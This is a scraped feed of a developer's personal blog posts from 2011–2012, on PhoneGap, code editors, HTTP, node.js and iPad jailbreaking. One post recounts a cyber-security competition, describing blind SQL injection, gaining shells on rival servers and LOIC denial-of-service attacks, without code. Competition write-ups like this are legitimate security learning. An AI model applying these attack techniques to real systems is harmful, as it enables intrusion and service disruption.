The entire code is available at my akira and akira-backend repositories.\nThoughts on Phonegap\nMy second slide in the presentation I did for the contest (made in Keynote on the iPad, while walking to the contest room) says proudly “Phonegap is awesome”. And I seriously mean that. I’ve gotten started in the world of mobile development, without having to worry about cross-browser compatibility issues, and the like. I can do stuff easily using the already existing technologies that I know and love. There are a ton of excellent Phonegap plugins out there, and many more being written right now.\nI am really impressed with what a web developer could do with Phonegap, and its ease of use. The Adobe Developers promised me that the integration would be far better in Dreamweaver 6, which I might just try. That said, it was far easier for me to compile and install the application on an Android phone, so I hardly used the emulator that I took pains to install.\nExpectations\nWhat I’d really love, though, is a Phonegap simulator. Instead of having to install an Android emulator, what if Dreamweaver came with a Phonegap simulator? Since Phonegap is all javascript, it should be trivial to create basic UIs that look and feel like the native interface of the OS chosen. I would still have to do final tests on the emulator, which I believe are worthless, compared to running it on actual devices. My point is, installing the Android emulator and getting the app to run in an emulator is really no big deal, but turns out to be a hugely time-consuming step. For interested web developers, this could be skipped pretty easily, if only Phonegap had its own simulator.\nThis is all just theory, as you’d have to install the complete Android and iOS SDKs to compile it for your device, anyway. But it would be a welcome step.\nPresentation\nThe presentation was made as a string of screenshots developing the application, so it’s not really much help. But here it is anyway. View Original.\n\n\nPrize\nI won a PS3. Yay!\nIf you have any problems with the code, or the process, feel free to reach out.",[],{"slug":3004,"title":3005,"link":3006,"pubDate":3007,"contentSnippet":3008,"tags":3009,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"sympathy-editor","Sympathy: My vision of a code editor","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F05\u002F20\u002Fsympathy-editor\u002F","2012-05-20T00:00:00.000Z","Update: I have worked on an editor prototype along the lines of this blog post. The result is called Sympathy Editor. Please check it out.\n\nI’ve used more than a dozen editors for mainly two purposes: coding, and writing text. The most liked and used among them would be Notepad++ (http:\u002F\u002Fnotepadplusplus.org\u002F) and Geany (http:\u002F\u002Fgeany.org\u002F). I’m also a vim user, and primarily a web developer. I’ve always liked simple tools that do one thing well, as per the unix philosophy.\nThe era of WYSIWYG editors in web development is long past. I’m yet to hear someone suggest Dreamweaver as a serious editor. If you were to go out in the Rails world, you’d mostly be met by vim\u002Femacs\u002Ftextmate fans. As a Linux user, I use geany for most of my editing work, including blog posts, like this one (Markdown is, hands down, the best thing to happen to word-processing).\nBrowser meet Editor meet Terminal\nThere were a few attempts at creating code editors (I don’t like the term IDE) powered by the gecko engine some time back. 
None of them materialized into anything special. Today, a normal workflow for me involves 3 open applications - a browser (chromium), a terminal window, and a text-editor.\nAnd I’d alt-tab all the way to hell on them.\nAt this stage, almost everyone will tell me, there is no problem with this workflow. This is exactly how it is supposed to work. But we are not in the 1990s when browsers were just another application. At any given time, I usually have multiple stackoverflow tabs open in the browser pertaining to the code I am writing.\nOn the other hand we have a terminal, which I usually use to run builds, compile, and do version control stuff. No amount of integrated IDE magic will make me move away from the beloved command line (as it should be).\nThe easiest solution is to get a second monitor. And yes, I love using dual monitors. But I’m still not satisfied. I want something more. I have 3 core applications, but using 3 monitors is an extremely costly venture. So I’m stuck to running a text editor, and alt-tabbing my way between Chromium and Gnome Terminal.\nCloud IDEs\nOne of the solutions that keeps popping up are the almighty cloud-based IDEs (like c9.io), which I really like. But the experience is sub-par at best.\nAnother cool project called sky-edit involves an extension in mozilla, which enables one to edit any text file in the browser itself, by pointing it to “edit:” URLs. This is closer to what my ultimate aim is: “text editor in a browser, editing local files”.\nWorkflow\nWhat I’d want my workflow to be is point my browser to a text file, edit it in place, change the tab to the live site, and then refresh. Once I realize I have to restart apache, I’d just change my tab to the terminal one, and do my cli stuff there itself.\nShortcuts:\nCtrl+T: New browser tab\nCtrl+E: New editor tab\nCtrl+Y: New Terminal tab\nCtrl+S: Save a file\nAll file:\u002F\u002F urls are browsable as usual, and all text files become editable. Just think of all the possibilities. As long as it uses plain old javascript\u002Fcss, it could re-use most of the editing part from the excellent ace project. Even codemirror would work brilliantly.\nAnd the best part is that it is still a complete browser. Meaning you get to use all your bookmarks, bookmarklets, plugins, and fancy stuff that you expect in a browser.\nIntegration\nJust think of the possibilities! Since this is just another browser, you can build extensions that target edit windows. Meaning an extension could add support for auto-completion very easily. And repeat for inline documentation browsing.\nA build shortcut could probably be used to switch to a running version of the website in some way. What about other stuff? Like spell-checking? Browsers support that. Even dictation would probably work.\nAnd markdown editing! Hell yeah! Edit it all in your browser itself, while keeping github open in another tab.\nStart\nThis is a simple proposal of sorts, to get a few recommendations about how this should proceed. I asked a similar question on the askubuntu forums, which made me realize what the real problems were. I’m trying to build chromium and get something off the ground. The project is tentatively titled sympathy and has zero code as of now.\nI earlier tried to write something similar in python, but realized that I could not build an awesome feature-complete text-editor by myself. Which made me shift to forking something like geany. 
I then realized that getting the webview in geany to be feature-complete as a browser would again be heavily demanding.\nThe easiest path out is to build the editor in the browser. Why? Because there has already been a lot of work done in this direction, including ace, bespin, codemirror and lots of other editors. Embedding the terminal is another problem, which will be harder to solve in the browser, but I’m willing to give it a try.\nAs such, my plan is to fork chromium, and work on adding support for text-file editing in the browser. There are a few questions I’d like to answer over time, such as should the browser be stripped? Chromium is a heavy project, and includes some complex features baked right in, which are definitely not needed in a text-editor. For instance “Cloud Print”, “Chrome Sync” etc. But at the same time, there is a reason to keep it in as well. I’d like to use this as my primary browser, using all the extensions, bookmarks, and sync features it offers me.\nSounds interesting? I’ve got no idea how to approach this. Help me out. If you do not like facebook comments, please discuss this on Hacker News, or feel free to drop me a mail.\nUpdate\nI did try my best at developing such a thing, and the end result (still far from finished) is Sympathy Editor. Try out the beta. Hopefully you will like it.",[],{"slug":3011,"title":3012,"link":3013,"pubDate":3014,"contentSnippet":3015,"tags":3016,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"new-design-captnemo-in","New Design of CaptNemo.in","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F31\u002Fnew-design-captnemo-in\u002F","2012-03-31T00:00:00.000Z","I did a redesign of the blog. The main goals for the redesign were to reach a\nclean, readable layout, which I feel I’ve accomplished.\nOld Design\nEverything was plain old bootstrap, except for the hover effect on the\nphotograph. I’ve also removed the old “Related Posts” feature, which I felt was\nnot at all useful. On the old homepage, the list of articles was presented as a plain list (\u003Cli>); it is now slightly better. The topbar has also been removed, instead focussing on a far better sidebar.\nNew Stuff\nI wanted a clean design more than anything. So instead of the sharebox being persistent on every device, I decided to hide it on lower resolutions. It currently hides if the screen width \u003C 1100px, so unless you are on a widescreen resolution monitor and using your browser on fullscreen, you won’t see it.\nResponsive design via bootstrap allows you to easily support mobile devices. The left sidebar is stacked, so that even mobile devices have no problem with the layout.\nI’d describe the design as clean, minimal.\nBootstrap\nThe earlier design was using Bootstrap 1.3, and I’ve upgraded to 2.0.2 now.\nI’ve used the new version before, but with zero changes using\nbootswatch in a few other places. But\nthis time, I decided to tweak bootstrap for my needs.\nI did away with the navigation bar, and changed the default fonts. The site\ndoes not feel like a stock bootstrap site any longer. The major contribution\nfrom bootstrap, was in fact the grid system, and the responsiveness, which\nreally helped me get it done quickly.\nTypography\nThe fonts used are Ubuntu for the content, and Gentium Book\nBasic for the\nheadings. 
I’m using the Google Web Fonts\nDirectory for the fonts.\nI’m only loading the italicized version of Gentium as I’ve chosen to display\nall headings (h1-h6) as italics.",[],{"slug":3018,"title":3019,"link":3020,"pubDate":3021,"contentSnippet":3022,"tags":3023,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"hollywood-what-can-we-learn","What can we learn from Hollywood","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F22\u002Fhollywood-what-can-we-learn\u002F","2012-03-22T00:00:00.000Z","There is a lot of buzz in the startup industry regarding the killing of Hollywood. However, before we do that (Amen), there is something that I wish to learn from it.\nHollywood ships.\nNo matter how much we shout at their broken distribution model, there is one thing that I deeply admire about hollywood. It gets shit done. On time. Again and again.\nWhy is this important? Because it is one of the largest industries I see around that sticks to deadlines on a regular basis. This is something deeply missing in the tech world.\nWhen the trailers of a movie tell me that it will be out in the summer, I know I can keep a block reserved for when it will come out. Quite unlike Microsoft, which may push back its release dates as often as it wants.\nBut I thought the Tech industry was done with this deadline bullshit?\nYes, I too despise deadlines and can’t wait for them to go away, but this article is about something else. This is much more about the undying spirit of Hollywood to release stuff.\nSo each time you are facing feature creep, and it looks like it will never ship, just look at Hollywood and get it done.",[],{"slug":3025,"title":3026,"link":3027,"pubDate":3028,"contentSnippet":3029,"tags":3030,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"planet-iitr-update","Planet IITR Update","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F13\u002Fplanet-iitr-update\u002F","2012-03-13T00:00:00.000Z","So, I was just going through my old blog posts, and saw the Planet IITR Update, which I created out of a need for people to be able to find blogs from other people in IITR.\nSince no one has ever submitted a single link to the planet, I just thought, why shouldn’t I just crawl all my Facebook friends from IIT-R, and check their website URLs. The Facebook part took ~20 minutes (getting the list of users from my 2 friendlists, followed by getting the website url for each of those friends). After that came the link checking part, which took ~15-20 minutes as well. A list of all the websites (very few people fill up that field on fb) I found during the search is here (just 39).\nAfter updating the planet, I had to update the spreadsheet as well. And here’s a list of the blogs, just in case.\n\n\nIn case someone is interested in taking over maintenance (meaning link curation) for Planet, please contact me at capt.n3m0@gmail.com, and I’ll be glad to share the authentication details with you.\nLink to Planet: Planet IIT-R\nIn case you were wondering what this planet stuff is all about, it allows one to add a single curated feed to one’s feed reader and get all updates via that.
So planet iitr is a curated collection of blogs pertaining to IIT-R.",[],{"slug":3032,"title":3033,"link":3034,"pubDate":3035,"contentSnippet":3036,"tags":3037,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-learn-http","Why you should learn HTTP?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F03\u002F05\u002Fwhy-learn-http\u002F","2012-03-05T00:00:00.000Z","I see people learning RoR, PHP, Django, with a single intent: getting their own website. Of course, it is the million dollar idea that will blow everyone away, as always. But what I find fascinating is that too many upcoming web developers are testing the waters with opinionated coding frameworks. The entry barrier for software development has been lowered exponentially in the last decade, leading to a slew of web frameworks, tutorials, and screencasts. Today is arguably the best time to be involved in software development. Lots of people are learning to code their first web-site with rails, or django. There are lots of benefits to this approach: as a beginner, you are kept isolated from all the complexities, and can focus more easily on your application.\nBut, it also leads to shallow learning. You could have written a dozen sinatra apps, and still not understand how it all works. And as it stands, it is not essential to learn it. You can easily develop entire websites thinking only in terms of urls, hyperlinks, routes and controllers. This is all good for starting up, when you don’t wanna deal with the complexity of it all, but I’d expect any competent web-developer to understand HTTP.\nYou see, HTTP is the foundation of the entire web. It is how the internet tubes work. Learning HTTP is uncovering the hidden layer behind your browser. It is understanding how cookies and sessions work in PHP; how xsrf attacks happen and how to mitigate them; the magic that rails does when it creates objects from the submitted form parameters transparently for you. And the best part is that it’s not all that difficult to learn.\nThere was a lot of debate concerning REST recently. I don’t claim to understand REST fully. I’m yet to meet someone who does. But I can comfortably build RESTish APIs, and consume them with ease without breaking a sweat. And smile at the fact that it’s all just HTTP. You cannot move to REST, HATEOAS unless you are comfortable with HTTP.\nSo, if you are a beginner in web-development, here’s my advice to you: Understand HTTP. A few pointers:\nRead a good book on HTTP.\nRead the HTTP RFC.\nWikibooks and Wikipedia entries on HTTP are quite good.\nUse the network tab in Webkit Inspector\u002FFirebug. And understand each of the damn headers.\nStart using curl -i, if you don’t already.\nAbove all, be curious.\nQuestion the web.",[],{"slug":3039,"title":3040,"link":3041,"pubDate":3042,"contentSnippet":3043,"tags":3044,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"shift-to-bundler-1-1","Shift to bundler 1.1 (Ruby)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F23\u002Fshift-to-bundler-1.1\u002F","2012-02-23T00:00:00.000Z","In case someone out there is still stuck with bundler 1.0, and hates seeing the Fetching source index for http:\u002F\u002Frubygems.org\u002F.
screen, please update to bundler 1.1.\nThe following command should do the trick:\n\ngem install bundler --pre\n\n\nBundler 1.1 is faster by a huge margin in comparison to 1.0.\nReferences\nhttp:\u002F\u002Fpatshaughnessy.net\u002F2011\u002F10\u002F14\u002Fwhy-bundler-1-1-will-be-much-faster\nhttp:\u002F\u002Frobots.thoughtbot.com\u002Fpost\u002F2729333530\u002Ffetching-source-index-for-http-rubygems-org",[],{"slug":3046,"title":3047,"link":3048,"pubDate":3049,"contentSnippet":3050,"tags":3051,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"make-post-request-with-requests-node-js","Making post requests with 'request' module in node.js","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F22\u002Fmake-post-request-with-requests-node.js\u002F","2012-02-22T00:00:00.000Z","Was stuck at this for quite some time:\nvar postData={\n\ta:1,\n\tb:2\n};\n\u002F\u002F form-encode the payload by hand, and say so in the content-type header\nrequire('request').post({\n\turi:\"http:\u002F\u002Fexample.com\u002Ftest\",\n\theaders:{'content-type': 'application\u002Fx-www-form-urlencoded'},\n\tbody:require('querystring').stringify(postData)\n\t},function(err,res,body){\n\t\tconsole.log(body); \u002F\u002F the response body\n\t\tconsole.log(res.statusCode);\n});\n\n\nThis will make a post request to http:\u002F\u002Fexample.com\u002Ftest with the querystring parameters in postData. Meaning if you are using PHP, you can see the variables in $_POST instead of parsing the request body.\nReferences:\nhttps:\u002F\u002Fgist.github.com\u002F1360979\nhttps:\u002F\u002Fgithub.com\u002Fmikeal\u002Frequest",[],{"slug":3053,"title":3054,"link":3055,"pubDate":3056,"contentSnippet":3057,"tags":3058,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"the-only-way-i-can-work","The only way I can work any longer","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F18\u002Fthe-only-way-i-can-work\u002F","2012-02-18T00:00:00.000Z","Being a good programmer is 3% talent and 97% not getting distracted by the Internet.\nFirstly, a frank admission.\nI procrastinate.\nFor every second I spend in front of my computer, trying to get some work done, there is a continuous struggle going on between my “work” and “play” side of things. Unfortunately, the “play” side seems to be winning. A lot. So I decided to wage a war against it.\nHere is my arsenal of tools:\nget-shit-done - A script that blocks all access to various sites (FB, reddit etc)\nChrome Profiles - One of my profiles is called “get-shit-done”. It features my development extensions, apps, bookmarks, and nothing else. It is plain vanilla Chromium with no puffy unicorns luring me to check my Facebook Notifications.\nMusic - I find Youtube a surprisingly good source of music discovery. I listen to almost everything. Recently, I’ve started to listen to Ludovico Einaudi. You may also like http:\u002F\u002Fmusicforprogramming.net\u002F in this regard.\nMinimal Tabs - I close a tab as soon as I’m done with it. This leads to ~3-5 tabs in my “get-shit-done” setup. Fewer tabs usually means a limit on the number of distracting links. Even Stackoverflow doesn’t help in this regard.\nThe get-shit-done profile even has settings to clear the cache on closing. This leads to me being signed out of everything, including GMail, Facebook, SO, and everything else. In this mode, I login to something only if it is essential to the work at hand.\nRead It Later - I’ve set up all Hacker News feeds above 20 points to be saved automatically to my Read It Later account, which I can easily consume on my iPad at my leisure.
However, I find myself itching to browse hckrnews every 5 minutes.\nIf you find yourself browsing facebook, reddit, youtube, hacker news, or reading blog posts on productivity, I strongly urge you to try this out. Defeating procrastination is not easy. And it’s never a win-or-lose battle. What are your thoughts? How do you stop yourself from getting lost on the internetz? Tell me in the comments.",[],{"slug":3060,"title":3061,"link":3062,"pubDate":3063,"contentSnippet":3064,"tags":3065,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"on-github-1","Things I love about Github","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F02\u002F02\u002Fon-github\u002F","2012-02-02T00:00:00.000Z","A slide from GitHub’s famous “How Github uses Github to build Github” talk:\nIn their recent version of the talk at RubyConf 2011, they changed the slide slightly:\nIt now reads “No Pings” instead of “No Managers”.\nNot nitpicking, just paying attention.\nIf you haven’t seen the talk (or just saw the slideshow), you should go and watch the talk (31 mins) Right Now.",[],{"slug":3067,"title":3068,"link":3069,"pubDate":3070,"contentSnippet":3071,"tags":3072,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"facebook-choose-group-vs-page","Choose Between Facebook Groups and Pages","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F01\u002F26\u002Ffacebook-choose-group-vs-page\u002F","2012-01-26T00:00:00.000Z","I don’t know how many times I’ve said this, but the best way of creating a multi-user discussion platform is to create a facebook page. A few guidelines on what you should use:\nCreate a group when you really need it (for \u003C100 people) and when you want to have close-knit discussions. (People get notifications for each post on the group) -> Leads to spamming\nNever create a fake profile for an organization\u002Fevent\u002Fcelebrity\u002Fanything that is not you. Creating fake profiles is actually against Facebook’s TOS, and can lead to account discontinuation. Plus, the barrier of friending a person (instead of “liking” it) is high enough to lead to fewer followers.\nCreate a Facebook Page for every other case, i.e. if you are a brand\u002Fnews\u002Fstartup\u002Forganization (public facing). This is usually the best choice, and it gives you the best outreach of all. (Especially if you want to reach out to People).\nIn short, just create a Page, unless you know what you are doing.
Please keep to your promises, and don’t make me quote Steve Yegge.\nAlso, while you are at it, please fix this issue and make the list of +1’d urls available.\nThanks,\nA frustrated developer and Google+ user.",[],{"slug":3081,"title":3082,"link":3083,"pubDate":3084,"contentSnippet":3085,"tags":3086,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"someone-jailbreak-my-ipad","Someone jailbreak my iPad","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F12\u002F05\u002Fsomeone-jailbreak-my-ipad\u002F","2011-12-05T00:00:00.000Z","This is a rant, mainly targeted at Apple. If you are an Apple fanboi, just go elsewhere.\nPlease, and quickly. I can’t take another minute of this iTunes. It refuses to properly sync songs, does not update my songs’ tag info unless I play them individually, and to top it all, my iPad gives out incorrect usage information about my apps. I tried adding them up, and it seems the total is way off. And since everything in the Apple land lives happily inside the proprietary Apple File System, I cannot even check it reliably. And don’t even get me started on the application transfers. The file sharing system is so bad in iOS that almost every other app comes built in with a wi-fi or ftp server. When almost every app that deals with files starts to do that, there is something definitely wrong with your file system approach.\nAnd why doesn’t my iTunes recognize any video files at all? I was given a warning about needing QuickTime, and I installed it, but it still refuses to play them in iTunes, and doesn’t even give me an error string to hold on to.\nSeriously, iTunes, go back to the bloatware land that you came from. I’ll try my luck with something else from now on. And if only someone could give me the specs for the arcane plist format, I might write a PC version of the iBooks app. And calibre needs to fix up its pdf to epub approach. Inline styles are not used anymore; doesn’t it know that already?\nA few days later…\nAfter spending a few more days with my iPad, I have developed a love\u002Fhate relationship with it. I hate the ugly sync process, which still refuses to sync videos, telling me I have to delete everything to start the sync. I love it for its ease of use, awesome touch, and aesthetics. I hate it for its lack of support, open sync protocols, and most of all Apple’s close-mindedness regarding unsigned binaries.\nSeriously Apple, if tablets are the computer of the future, treat them as such. Let me treat it as a fully functional computer, which lets me run whatever I want, with whatever privileges I want.\nIf Microsoft had tried to create such a walled garden of apps in Windows, would it have been so successful? Granted, people would love running apps from the Windows 8 Marketplace, if only because it would keep their software updated. But Windows at least has a choice: to allow me to download a tiny binary from a small Windows Developer who does not want to pay MS just to let people use his\u002Fher apps.\nAn appstore is an excellent idea, executed brilliantly by Apple, but please follow MS and give us an official way to do whatever the hell I want to do with my iPad.\nA few weeks later…\nI really hate my iPad now, especially once I realise that my cheap Nokia cell phone has tether support, while my iPad does not. Any task that may require access to a normal file system, such as cloning a repository from github or editing a document, is impossible on the device.
I love playing games on it, though it seems like a really costly device to play games and read books on. Get the Fire at less than half the price, and root it to install cyanogen mod (which will soon be available for the Fire).\nSometimes, I wonder if Indian carriers would have installed Carrier IQ on an iPad (which comes without a SIM card). I’ll find out as soon as I can root it.\nOne of my friends gave a very serious comment on the iPad: “It seems as if you have rented the device from Apple, rather than bought it”. And I’ve come to realise that it’s a reflection of the sad state that the electronics manufacturing industry is in today.\nA few more weeks later:\nI jailbroke my iPad :)\nFurther links:\nKindle fire unroots itself\nFire doesn’t allow you to visit android marketplace\nCarrier IQ controversy\nNokia dumb phone features - X2-01\nHow I Jailbroke my iPad",[],{"slug":3088,"title":3089,"link":3090,"pubDate":3091,"contentSnippet":3092,"tags":3093,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cctc-blog","My Experience with the Deloitte Cyber Collegiate Threat Competition (2011)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F11\u002F20\u002Fcctc-blog\u002F","2011-11-20T00:00:00.000Z","I was recently part of a team at IIT-Roorkee that won the Deloitte Cyber Collegiate Threat Competition. It was a competition modeled after the Deloitte-sponsored CCDC in the US. The event will be organized in the subsequent years as well, and hence this blog post will summarize my experience so as to help any future participants. Moreover, the organizing team has guaranteed us that the competition will be altered significantly in the coming years. This was the first year that this event was organized, after all.\nI’ll go into the contest round by round, beginning with Round 1.\nRound 1\nDeloitte came to our campus, with little promotion about the event. A presentation was given on the current scenario of Cyber Threat, particularly with respect to India. Free swag was awarded to people who asked some good questions, or answered some as well. After the presentation, a quiz was given out, consisting mainly of questions about Web Application Security. A few of the questions asked us to write down code to circumvent a particular issue (like SQL Injection). But it was mostly about stuff that every security-conscious Web Developer would know about.\nAfter the quiz, they selected the top 9 candidates, and asked us to form teams. Make sure that you attend the quiz with your friends, as we definitely had an edge by knowing everyone in our team before the event. The number of teams varied from campus to campus. But if you perform decently enough, you will be selected.\nRound 2\nEach of the teams was given a VM Image, and we were asked to hack into it. We were not allowed to exploit vulnerabilities in the guest OS, or things like VMWare, or try to boot into the image with another OS, but other than that anything went.\nThe VM had a library application, with several vulnerabilities. A challenge sheet was mailed to us, and we were expected to finish as many challenges as we could. Any further vulnerabilities not mentioned in the challenge could also be mentioned, but they were only to be used in the case of a tie with another team.\nThe time duration for Round 2 was 15 days and we were supposed to submit our reports by then. We were able to complete most of the challenges after we found a blind sql injection vulnerability.
Further, we were able to get a copy of the obfuscated PHP code, which we converted to simpler versions easily enough. We had no way to make use of the code, but it did help us in identifying possible files and entry routes for vulnerabilities.\nTo get a good score in round 2, try to attack every point in the application. In our case, some of them were too stupid to be used in a real-world scenario. For instance, we had password hashes appearing in images. Pore over the javascript code, and search like hell. Stuff like w3af might help you, but since it’s a limited application only, it is often easier to just track the application flow. We did try kernel-level exploits, but the VM was fully patched and up to date.\nRound 3\nRound 3 was organized at Hyderabad and was a head-on, hack-everything contest. We were handed 3 virtual machines, with lots of vulnerable services. We had to keep those services running, and they were periodically pinged by a scorebot. Scores were awarded in three categories: attack, defense, and flags.\nAttack points were earned upon getting a shell on any of the other teams’ servers.\nFlag points were awarded on the basis of getting access to secrets stored inside the other teams’ servers.\nDefense points were earned on the basis of the status of your own services.\nThe network architecture was 3-tiered. A single central router routed requests to a team’s router, which was then connected to an individual team switch. A switch was connected to the host VM, and the attack machines. Two different subnets were created for attack and defense in each team’s router. All uVMs were present in the attack subnets.\nDay 1\nDay 1 consisted mostly of us learning about the network and trying to gain access to the other systems. All the services were highly vulnerable, and as a result, we had to patch a vulnerability in our own servers before we attacked anyone with it. DoS attacks started late in the day, but were ever present.\nThe VMs handed to us included a Windows Server 2003, a debian, and an Ubuntu. Only open source\u002Ffreeware tools were allowed, and we used lots of stuff including:\nBacktrack for almost everything, since the attack laptops given to us had Windows installed\nLOIC for DoS attacks\nWireshark for packet analysis\nSnort for intrusion detection\nNMap for scanning services\nMetasploit for trying out exploits\nCain and Abel for miscellaneous stuff\nDay 2\nDay 2 involved lots of pwning, and a surprise twist. All VMs had been reset to their original day 1 state, and we had to patch them all over again in the first fifteen minutes of the session. Other than that, the increase in traffic was exponential. All our machines were scanned to hell. DoS attacks became normal, and the epic moment of the day was during the last session, when we had our router pwned.\nPics from the Event are at Facebook.\nConclusion\nKudos to the Deloitte Team for organizing such a brilliant contest. We had lots of fun. They have assured us that next year it will be even bigger and better. And that the format will be entirely different
next year, so this blog post might not be as helpful as you may have thought.",[],{"slug":3095,"title":3096,"link":3097,"pubDate":3098,"contentSnippet":3099,"tags":3100,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"github-projects-to-follow","Github +1 URLs","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F10\u002F17\u002Fgithub-projects-to-follow\u002F","2011-10-17T00:00:00.000Z","I was working on the Google +1 Listing API (undocumented). So here’s a list of my current +1 urls on github.com. Most of the projects pertain to web-designing. I’ll update this list automatically every week or so, provided I remember to\u002Fset a cron job.\njayferd\u002Fcolor.js\n          \ncolor.js - The missing color library\ntypicaljoe\u002Ftaffydb\n          \ntaffydb - TaffyDB - an open source JavaScript Database for your browser\nantirez\u002Flamernews\n          \nlamernews - Lamer News -- an HN style social news site written in Ruby\u002FSinatra\u002FRedis\u002FJQuery\nfelixge\u002Fnode-mysql\n          \nnode-mysql - A pure node.js JavaScript Client implementing the MySql protocol.\ndaneden\u002Fanimate.css\n          \nanimate.css - A big ol' goody bag filled with CSS animations for WebKit, Firefox and beyond.\njavve\u002Flist\n          \nDo you want a 7 KB cross-browser native JavaScript that makes your plain HTML lists super flexible, searchable, sortable and filterable? Yea\nazer\u002Fjekyll-social-activities\n          \njekyll-social-activities - a jekyll project template to list social network activities\ne1ven\u002FRobohash\n          \nRobohash - RoboHash.org\ndonpark\u002Fnode-robohash\n          \nnode-robohash - node.js implementation of Robohash. It's neither complete nor render general SVG.\nlg\u002Fmarshmallow\n          \nmarshmallow - An open source Campfire server\ntmcw\u002Fbig\n          \nbig - presentations for busy messy hackers\nAll of the Hooks\n          \nService Hooks are available for more events (issues, pull requests, forks, etc). Update them through the API!\nchromakode\u002Fkarmabot\n          \nkarmabot - A highly extensible IRC karma+information bot written in Python.\nmoserware\u002FPHPSkills\n          \nPHPSkills - An implementation of the TrueSkill algorithm in PHP\nnodejitsu\u002Fdocs\n          \ndocs - Community powered rocket fuel for node.js\nspin.js\n          \nAn animated CSS activity indicator with VML fallback.\nAlice.js Demos\n          \nAlice.js Demos. Alice.js (A Lightweight Independent CSS Engine) is a micro JavaScript library focused on using hardware-accelerated capabili\ntcorral\u002FDesign-Patterns-in-Javascript\n          \nDesign-Patterns-in-Javascript - Based in examples on Head First Design Patterns\natduskgreg\u002Fsrender\n          \nsrender - John Resig's Simple Javascript Templating turned into a jQuery Plugin\nmrdavidlaing\u002Ffunctional-javascript\n          \nfunctional-javascript - A fun set of koans to teach you functional programming techniques in Javascript\nmrdavidlaing\u002Fjavascript-koans\n          \njavascript-koans - Koans to learn Javascript\nrobrighter\u002Fcurrent\n          \ncurrent - Node.js app for visualizing http requests on a lan\nbcoe\u002Fendtable\n          \nendtable - A ridiculously simple Object Mapper for Node running on top of CouchDB.\nsproutcore\u002Fsproutcore\n          \nsproutcore - JavaScript Application Framework - JS library only\ntpope's Profile\n          \ntpope (Tim Pope). Name: Tim Pope.
Website\u002FBlog: http:\u002F\u002Ftpo.pe\u002F. Company: Waiting on t\ntpope\u002Fvim-fugitive\n          \nvim-fugitive - fugitive.vim: a Git wrapper so awesome, it should be illegal\ngithub\u002Fgitignore\n          \nA collection of useful .gitignore templates\nChosen - a JavaScript plugin for jQuery and Prototype - makes select boxes better\n          \nStandard Select.\nharvesthq\u002Fchosen\n          \nchosen - Chosen is a library for making long, unwieldy select boxes more friendly.\nrthauby\u002FPaige\n          \nPaige - Super simple project page generation\ndocco.coffee\n          \nDocco is a quick-and-dirty, hundred-line-long, literate-programming-style documentation generator. It produces HTML that displays your comme\nLeaVerou\u002Fprefixfree\n          \nprefixfree - Break free from prefix hell!\ntwitter\u002Fscala_school\n          \nscala_school - Lessons in the Fundamentals of Scala\narcturo\u002Flibrary\n          \nA library of free eBooks we're working on\ntcr\u002Fselection.js\n          \nselection.js - A tiny JavaScript DOM selection library for modern browsers and IE5-8.\nFirst Annual Octocat Dodgeball Invitational\n          \nWhy? We were brainstorming in the office and decided we should throw balls at our enemies. But why stop at destroying our enemies with foam \nnide - Beautiful IDE for Node.JS\n          \nnide. Beautiful IDE for Node.JS. nide is a web-based IDE for Node.js, designed with simplicity and ease-of-use in mind. The current version \nmikeal\u002Frequest\n          \nSimplified HTTP request client.\nunconed\u002FTermKit\n          \nTermKit - Experimental Terminal platform built on WebKit + node.js. Currently only for Mac and Windows, though the prototype works 90% in an\nIf Dropbox Used GitHub’s Pricing Plan\n          \nIf Dropbox Used GitHub's Pricing Plan. What if Dropbox used GitHub's pricing model? Folders? Yes, folders. I have a lot of folders.",[],{"slug":3102,"title":3103,"link":3104,"pubDate":3105,"contentSnippet":3106,"tags":3107,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"awesome-webapps","Must Use Web Applications","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F10\u002F15\u002Fawesome-webapps\u002F","2011-10-15T00:00:00.000Z","Here are a few of the applications that I would heavily recommend.\nWorkflowy\nHere’s how Workflowy describes itself.\nWorkFlowy is a simple, but powerful way to manage all the information in your life.\nHere’s their introductory video:\nIf that does not hook you, I don’t know what will.\nClipboard\nClipboard is a content archiver tool that makes it quick, snappy, easy, and cool. It has got tons of features and is still in private beta. However, since Michael Arrington blogged about it, it has begun accepting a larger number of invites. I’ve only started to use it, but it has been quite awesome till now.\nMy favorite feature is embed. Everything I’ve embedded on this page is via clipboard, as a demo. You can clip tweets, pics, videos and what not, and embed it on your blog easily.\nGe.tt\nGe.tt is one of the many file sharing sites that seem to have cropped up in Web 2.0. Its USP is its simplicity, but don’t be fooled by it.
